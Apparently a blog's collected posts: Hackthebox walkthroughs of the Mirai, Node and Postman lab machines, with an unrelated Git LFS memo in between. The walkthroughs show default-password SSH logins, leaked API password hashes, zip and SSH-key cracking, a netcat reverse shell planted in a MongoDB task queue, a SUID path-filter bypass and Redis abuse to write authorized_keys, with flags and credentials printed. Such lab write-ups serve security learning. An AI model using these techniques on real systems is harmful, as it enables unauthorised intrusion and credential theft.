Hackthebox Mirai Walkthrough

placeholder

Explanation

Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
This is a walkthrough of a box Mirai.

Solution

1. Initial Enumeration

TCP Port Scanning:

root@kali:~# nmap -p- 10.10.10.48 -sV -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-10 09:35 EEST
Nmap scan report for 10.10.10.48
Host is up (0.033s latency).
Not shown: 65529 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
|   1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
|   2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
|   256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_  256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp    open  domain  dnsmasq 2.76
| dns-nsid:
|_  bind.version: dnsmasq-2.76
80/tcp    open  http    lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
1050/tcp  open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open  http    Plex Media Server httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
|_http-title: Unauthorized
32469/tcp open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.07 seconds

Gobuster HTTP:

root@kali:~# gobuster dir -u http://10.10.10.48 -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.48
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/04/10 09:37:20 Starting gobuster
===============================================================
/admin (Status: 301)
/swfobject.js (Status: 200)
===============================================================
2020/04/10 09:37:36 Finished
===============================================================

2. Getting User

We found an admin console in 10.10.10.48/admin/.
The name of the service is Pi-hole. placeholder

The default password for Pi-holeis pi:raspberry.
We can use it for the SSH login.

root@kali:~# sshpass -p raspberry ssh pi@10.10.10.48

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Apr 10 06:49:57 2020 from 10.10.14.32 

SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.


SSH is enabled and the default password for the 'pi' user has not been changed. 
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.

pi@raspberrypi:~ $

Now we got an user pi.
user.txt is in a directory /home/pi/Desktop.

pi@raspberrypi:~ $ cat Desktop/user.txt 
ff837707441b257a20e32199d7c8838d

3. Getting Root

Using sudo -l, we can find out that we can run any command with root privilege.

pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User pi may run the following commands on localhost:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL

Change the user and go to /root.
We have root.txt which says we don’t have the flag here.

root@raspberrypi:~# cat root.txt 
I lost my original root.txt! I think I may have a backup on my USB stick...

Using df -h, we can find out /dev/sdb is mounted on /media/usbstick.

root@raspberrypi:~# df -h
Filesystem      Size  Used Avail Use% Mounted on
aufs            8.5G  2.8G  5.3G  34% /
tmpfs           100M  4.8M   96M   5% /run
/dev/sda1       1.3G  1.3G     0 100% /lib/live/mount/persistence/sda1
/dev/loop0      1.3G  1.3G     0 100% /lib/live/mount/rootfs/filesystem.squashfs
tmpfs           250M     0  250M   0% /lib/live/mount/overlay
/dev/sda2       8.5G  2.8G  5.3G  34% /lib/live/mount/persistence/sda2
devtmpfs         10M     0   10M   0% /dev
tmpfs           250M  8.0K  250M   1% /dev/shm
tmpfs           5.0M  4.0K  5.0M   1% /run/lock
tmpfs           250M     0  250M   0% /sys/fs/cgroup
tmpfs           250M  8.0K  250M   1% /tmp
/dev/sdb        8.7M   93K  7.9M   2% /media/usbstick
tmpfs            50M     0   50M   0% /run/user/999
tmpfs            50M     0   50M   0% /run/user/1000

Then, go to /media/usbstick.
There is an interesting file damnit.txt.

root@raspberrypi:/media/usbstick# cat damnit.txt 
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?

-James

Sounds root.txt has been deleted already.
We can find the flag by running strings.

root@raspberrypi:~# strings /dev/sdb
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt                                                                                         
damnit.txt                                                                                       
>r &                                                                                             
3d3e483143ff12ec505d026fa13e020b                                                                 
Damnit! Sorry man I accidentally deleted your files off the USB stick.                           
Do you know if there is any way to get them back?                                                
-James

Hackthebox Node Walkthrough

placeholder

Explanation

Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
This is a walkthrough of a box “Node”.

Solution

1. Initial Enumeration

TCP Port Scanning:

root@kali:~# nmap -p- 10.10.10.58 -sV -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-05 21:28 EEST
Nmap scan report for 10.10.10.58
Host is up (0.040s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
|   256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_  256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open  hadoop-datanode Apache Hadoop
| hadoop-datanode-info:
|_  Logs: /login
| hadoop-tasktracker-info:
|_  Logs: /login
|_http-title: MyPlace
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 118.96 seconds

2. Getting User

We can find a NodeJS website on port 3000. placeholder

Using Burp Suite, we can find an interesting HTTP request to “/api/users/latest”. placeholder

Then, access to the API.
We can see some passwords for user “tom”, “mark” and “rastating”.

root@kali:~# curl -s http://10.10.10.58:3000/api/users/latest | jq
[
  {
    "_id": "59a7368398aa325cc03ee51d",
    "username": "tom",
    "password": "f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240",
    "is_admin": false
  },
  {
    "_id": "59a7368e98aa325cc03ee51e",
    "username": "mark",
    "password": "de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73",
    "is_admin": false
  },
  {
    "_id": "59aa9781cced6f1d1490fce9",
    "username": "rastating",
    "password": "5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0",
    "is_admin": false
  }
]

Next, try “/api/users”.
We can find an admin user “myP14ceAdm1nAcc0uNT”.

root@kali:~# curl -s http://10.10.10.58:3000/api/users/ | jq
[
  {
    "_id": "59a7365b98aa325cc03ee51c",
    "username": "myP14ceAdm1nAcc0uNT",
    "password": "dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af",
    "is_admin": true
  },
  {
    "_id": "59a7368398aa325cc03ee51d",
    "username": "tom",
    "password": "f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240",
    "is_admin": false
  },
  {
    "_id": "59a7368e98aa325cc03ee51e",
    "username": "mark",
    "password": "de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73",
    "is_admin": false
  },
  {
    "_id": "59aa9781cced6f1d1490fce9",
    "username": "rastating",
    "password": "5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0",
    "is_admin": false
  }
]

We can crack the password using Crackstation.net.
The cracked password is “manchester”. placeholder

We can download a file “myplace.backup” base64 encoded. placeholder

Try to decode with base64 command.

root@kali:~# cat myplace.backup | base64 --decode > myplace
root@kali:~# file myplace
myplace: Zip archive data, at least v1.0 to extract

Since the zip file is password protected, try to brute-force using “fcrackzip”.
The password is “magicword”.

root@kali:~# unzip myplace
Archive:  myplace
[myplace] var/www/myplace/package-lock.json password:

root@kali:~# fcrackzip -D -p /usr/share/wordlists/rockyou.txt myplace
possible pw found: magicword ()

Then, unzip the archive. It looks like a source code of a NodeJS web application.

root@kali:~# unzip myplace
Archive:  myplace
[myplace] var/www/myplace/package-lock.json password:
  inflating: var/www/myplace/package-lock.json
  inflating: var/www/myplace/node_modules/serve-static/README.md
  inflating: var/www/myplace/node_modules/serve-static/index.js

---

Take a look at the source code.
In “/var/www/myplace/app.js”, we can find a mongodb credential for user “mark”.

root@kali:~/var/www/myplace# cat app.js | grep mongo
const MongoClient = require('mongodb').MongoClient;
const ObjectID    = require('mongodb').ObjectID;
const url         = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
    console.log('[!] Failed to connect to mongodb');

We can use the credential for SSH connection.

mark:5AYRft73VtFpc84k
root@kali:~# ssh mark@10.10.10.58
mark@10.10.10.58's password: 

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.




              .-. 
        .-'``(|||) 
     ,`\ \    `-`.                 88                         88 
    /   \ '``-.   `                88                         88 
  .-.  ,       `___:      88   88  88,888,  88   88  ,88888, 88888  88   88 
 (:::) :        ___       88   88  88   88  88   88  88   88  88    88   88 
  `-`  `       ,   :      88   88  88   88  88   88  88   88  88    88   88 
    \   / ,..-`   ,       88   88  88   88  88   88  88   88  88    88   88 
     `./ /    .-.`        '88888'  '88888'  '88888'  88   88  '8888 '88888' 
        `-..-(   ) 
              `-` 




The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Wed Sep 27 02:33:14 2017 from 10.10.14.3
mark@node:~$ id
uid=1001(mark) gid=1001(mark) groups=1001(mark)

However, we are still not capable of getting user.txt.
We have other 2 users.

mark@node:/home$ ls -l
total 12
drwxr-xr-x 2 root root 4096 Aug 31  2017 frank
drwxr-xr-x 3 root root 4096 Sep  3  2017 mark
drwxr-xr-x 6 root root 4096 Sep  3  2017 tom

If take a look at the processes, we can see 2 processes by another user “tom”.

mark@node:~$ ps aux | grep tom
tom       1211  0.0  5.8 1074616 44232 ?       Ssl  19:31   0:03 /usr/bin/node /var/scheduler/app.js
tom       1231  0.0  6.6 1024156 50068 ?       Ssl  19:31   0:04 /usr/bin/node /var/www/myplace/app.js
mark      1610  0.0  0.1  14228  1020 pts/0    S+   23:05   0:00 grep --color=auto tom

Using the following command, we can access the command line interface of MongoDB.
Also it is possible to insert reverse shell command.

mark@node:~$ mongo -u mark -p 5AYRft73VtFpc84k localhost/scheduler
MongoDB shell version: 3.2.16
connecting to: localhost/scheduler
> db.tasks.insertOne( { cmd: "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|/bin/nc 10.10.14.6 4444 >/tmp/f" } );
{
        "acknowledged" : true,
        "insertedId" : ObjectId("5e8b80f878ddbff46dfcb0d7")
}
> exit
bye

Launch a netcat listener.

root@kali:~# nc -nlvp 4444
listening on [any] 4444 ...

After a few minutes, we can get a reverse shell as user “tom”.

root@kali:~# nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.58] 38860
bash: cannot set terminal process group (1230): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

tom@node:/$ id
id
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin)

user.txt is in the directory “/home/tom”.

tom@node:/$ cd /home/tom
cd /home/tom
tom@node:~$ ls
ls
user.txt
tom@node:~$ cat user.txt
cat user.txt
e1156acc3574e04b06908ecf76be91b1

3. Getting Root

With the following command, we can find a binary file “/usr/local/bin/backup”

tom@node:/tmp$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/local/bin/backup
/usr/bin/chfn
/usr/bin/at
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/newuidmap
/bin/ping
/bin/umount
/bin/fusermount
/bin/ping6
/bin/ntfs-3g
/bin/su
/bin/mount

Also, we can find a way to use this executable in the previous script “/var/www/myplace/app.js”.
The “backup_key” is also in this code.

200   app.get('/api/admin/backup', function (req, res) {
201     if (req.session.user && req.session.user.is_admin) {
202       var proc = spawn('/usr/local/bin/backup', ['-q', backup_key, __dirname ]);
203       var backup = '';

This time, we can bypass the filter of the binary with the following way.

tom@node:/tmp$ /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 "/roo\t/roo\t.txt" | base64 -d > /tmp/flag.zip
<0afc3d98a8d0230167104d474 "/roo\t/roo\t.txt" | base64 -d > /tmp/flag.zip    

tom@node:/tmp$ unzip -P magicword flag.zip
unzip -P magicword flag.zip
Archive:  flag.zip
 extracting: root/root.txt

Now we extracted the root.txt

tom@node:/tmp$ cat root/root.txt
cat root/root.txt
1722e99ca5f353b362556a62bd5e6be0

Memo / Enable Git Large File Storage on GitHub

Explanation

Git Large File Storage is an extension to replaces binary file with text pointers inside Git repository.
This is a memo of enabling GFS on GitHub,

Environment

  • OS: Kali linux 2019.4

Reference

Package installation

root@kali:~# git lfs install
Git LFS initialized.

Tracking PNG files

We need the following command for the tracking .png files.

$ git lfs track "*.png"
Tracking "*.png"

We can confirm that now we have “.gitattributes”
There is an entry for “.png” file.

$ cat .gitattributes 
*.png filter=lfs diff=lfs merge=lfs -text

After that, we need to commit these files again.

$ git status
On branch Github-LFS
Changes not staged for commit:
  (use "git add <file>..." to update what will be committed)
  (use "git restore <file>..." to discard changes in working directory)
        modified:   public/images/2017-09-21/gcc-1.png
        modified:   public/images/2017-09-21/gcc-2.png
        modified:   public/images/2017-09-21/gcc-3.png
        modified:   public/images/2018-12-01/2018-12-05-09-49-17.png
        modified:   public/images/2018-12-01/2018-12-05-09-50-24.png

---

Then, commit and push the branch.
We see some diagnostic information about .png file upload.

$ git push origin Github-LFS

---

Enumerating objects: 761, done.0/310), 21 MB | 965 KB/s
Counting objects: 100% (761/761), done.
Delta compression using up to 8 threads
Compressing objects: 100% (376/376), done.
Writing objects: 100% (385/385), 50.71 KiB | 1.37 MiB/s, done.
Total 385 (delta 5), reused 0 (delta 0)

---

Alternatively, we can use “git lfs migrate” command.

$ git lfs migrate import --include="*.png"
migrate: override changes in your working copy? [Y/n] Y
migrate: changes in your working copy will be overridden ...
migrate: Fetching remote refs: ..., done.
migrate: Sorting commits: ..., done.
migrate: Rewriting commits: 100% (2/2), done.
  master                33de649d04553205a0db99802b2b965459e284ce -> cb1533f0115d4a0caaa691b9c6eff20a73670e0a
migrate: Updating refs: ..., done.
migrate: checkout: ..., done.

After the command execution, we need to run the following command to remove the pre-existing objects.

$ git reflog expire --expire-unreachable=now --all
$ git gc --prune=now
Enumerating objects: 3197, done.
Counting objects: 100% (3197/3197), done.
Delta compression using up to 8 threads
Compressing objects: 100% (1526/1526), done.
Writing objects: 100% (3197/3197), done.
Total 3197 (delta 1642), reused 3197 (delta 1642)

Now we can see that our binary file is managed by Git LFS. placeholder

Hackthebox Postman Walkthrough

placeholder

Explanation

Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
This is a walkthrough of a box “Postman”.

Solution

1. Initial Enumeration

TCP Port Scanning:

root@kali:~# nmap -p- 10.10.10.160 -sV -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-14 18:54 EET
Nmap scan report for 10.10.10.160
Host is up (0.043s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp  open  redis   Redis key-value store 4.0.9
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 83.81 seconds

Gobuster HTTP:

root@kali:~# gobuster dir -u http://10.10.10.160 -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.160
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/03/14 18:59:56 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/css (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/index.html (Status: 200)
/js (Status: 301)
/server-status (Status: 403)
/upload (Status: 301)
===============================================================
2020/03/14 19:00:16 Finished
===============================================================

Redis enumeration:

Reference: https://book.hacktricks.xyz/pentesting/6379-pentesting-redis

1n4r1@kali:~$ redis-cli -h 10.10.10.160
10.10.10.160:6379> info
# Server
redis_version:4.0.9
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:9435c3c2879311f3
redis_mode:standalone
os:Linux 4.15.0-58-generic x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:7.4.0
process_id:616
run_id:521dd2981efd190099f6fdc8744a20a1b3217664
tcp_port:6379
uptime_in_seconds:444
uptime_in_days:0
hz:10
lru_clock:7323466
executable:/usr/bin/redis-server
config_file:/etc/redis/redis.conf

---

10.10.10.160:6379> keys *
(empty list or set)

0.10.10.160:6379> config get *
  1) "dbfilename"
  2) "dump.rdb"
  3) "requirepass"
  4) ""
  5) "masterauth"
  6) ""
  7) "cluster-announce-ip"
  8) ""
  9) "unixsocket"

---

2. Summary

  1. Port 22: OpenSSH running
  2. Port 80: HTTP website running with Apache
  3. Port 6379: Redis 4.0.9 running (anonymous access allowed)
  4. Port 10000: Webmin httpd running

3. Getting User

Since we have access to redis, we can enumerate the file system with the following way.
As you can see, if we set a non-existing directory, it shows “No such file or directory”.

10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis"
10.10.10.160:6379> config set dir /var/lib/redis/non-exist-directory
(error) ERR Changing directory: No such file or directory

This time, we can find a directory for ssh in the home directory of redis user.

10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK
10.10.10.160:6379> 

Next, try to upload a public key for SSH.

root@kali:~# (echo -e "\n\n"; cat .ssh/id_rsa.pub; echo -e "\n\n") > pubkey.txt
root@kali:~# cat pubkey.txt | redis-cli -h 10.10.10.160 -x set pubkey
OK

After that, save the key into the “/var/lib/redis/.ssh/authorized_keys”.

root@kali:~# redis-cli -h 10.10.10.160
10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK
10.10.10.160:6379> config set dbfilename "authorized_keys"
OK
10.10.10.160:6379> save
OK
10.10.10.160:6379> 

Now we can SSH into the server as an user redis.
However, we don’t have the “user.txt” in the home directory of redis user.

root@kali:~# ssh redis@10.10.10.160
The authenticity of host '10.10.10.160 (10.10.10.160)' can't be established.
ECDSA key fingerprint is SHA256:kea9iwskZTAT66U8yNRQiTa6t35LX8p0jOpTfvgeCh0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.160' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
redis@Postman:~$ id
uid=107(redis) gid=114(redis) groups=114(redis)
redis@Postman:~$ 

With some enumeration, we can find an interesting file “id_rsa.bak” in the “/opt” directory.

redis@Postman:~$ ls /opt/
id_rsa.bak

redis@Postman:~$ cat /opt/id_rsa.bak 
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C

JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX
cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2
7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6
cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9
1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv
EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP
UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY
Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK
t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS
5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke
P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6
jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge
SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i
l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X
0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p
S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR
hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+
Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V
XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD
b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi
WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh
KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm
npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ
VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W
X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw==
-----END RSA PRIVATE KEY-----
redis@Postman:~$ 

Try to download with scp.

root@kali:~# scp redis@10.10.10.160:/opt/id_rsa.bak /root
id_rsa.bak                                                        100% 1743    38.3KB/s   00:00    
root@kali:~# 

Kali Linux can brute-force the password of a SSH private key with the John the Ripper.
However, we need to change the SSH private key into the hash which format is crackable by John the Ripper.
By cracking with “rockyou.txt”, we can achieve a password “computer2008” for someone.

root@kali:~# /usr/share/john/ssh2john.py id_rsa.bak > hash.txt

root@kali:~# john hash.txt -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (id_rsa.bak)
Warning: Only 2 candidates left, minimum 8 needed for performance.
1g 0:00:00:06 DONE (2020-03-15 10:55) 0.1468g/s 2105Kp/s 2105Kc/s 2105KC/sa6_123..*7¡Vamos!
Session completed

Actually, we have only one user “Matt” who is allowed to log in except redis.
This time, we can’t SSH but we can run su command to be the user “Matt”.

redis@Postman:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
Matt:x:1000:1000:,,,:/home/Matt:/bin/bash
redis:x:107:114::/var/lib/redis:/bin/bash

redis@Postman:~$ su Matt
Password: 
Matt@Postman:/var/lib/redis$ 

The user.txt is in the home directory of user “Matt”.

Matt@Postman:~$ pwd
/home/Matt

Matt@Postman:~$ cat user.txt 
517ad0ec2458ca97af8d93aac08a2f3c

3. Getting Root

We still have one service that we haven’t looked through with is “Webmin httpd”. placeholder

For the privilege escalation, we can use the credential for Matt again.
By trying the credential for Matt, we can confirm that the credential for Matt is available for the authentication.

Matt:computer2008

placeholder

Also, we can search the vulnerability for the Webmin v1.9.1 with searchsploit.

root@kali:~# searchsploit webmin
-------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                            |  Path
                                                                          | (/usr/share/exploitdb/)
-------------------------------------------------------------------------- ----------------------------------------
DansGuardian Webmin Module 0.x - 'edit.cgi' Directory Traversal           | exploits/cgi/webapps/23535.txt
Webmin - Brute Force / Command Execution                                  | exploits/multiple/remote/705.pl
Webmin 0.9x / Usermin 0.9x/1.0 - Access Session ID Spoofing               | exploits/linux/remote/22275.pl
Webmin 0.x - 'RPC' Privilege Escalation                                   | exploits/linux/remote/21765.pl
Webmin 0.x - Code Input Validation                                        | exploits/linux/local/21348.txt
Webmin 1.5 - Brute Force / Command Execution                              | exploits/multiple/remote/746.pl
